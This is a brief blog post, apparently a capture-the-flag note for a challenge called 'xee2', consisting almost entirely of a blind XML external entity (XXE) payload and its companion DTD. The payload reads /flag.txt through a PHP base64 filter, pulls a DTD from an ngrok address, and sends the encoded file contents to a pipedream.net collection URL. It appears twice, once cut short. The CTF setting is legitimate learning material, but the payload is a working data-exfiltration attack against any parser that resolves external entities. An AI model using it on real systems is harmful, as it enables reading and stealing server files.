Noway :/ xee2 @AbuQasem
//Server
<user><username>z</username><password>&ext;</password></user>
//DTD
%eval;
%exfil;
Noway :/ xee2 @AbuQasem
//Server
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE data [ <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt"> <!ENTITY % ext SYSTEM "https://00ed-86-108-60-14.ngrok-free.app/m.dtd"> %ext; ]> <user><username>z</username><password>&ext;</password></user>
//DTD <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'https://en0w6ukj0qarx.x.pipedream.net/?flag=%file;'>">
%eval;
%exfil;
Nhận xét
Đăng nhận xét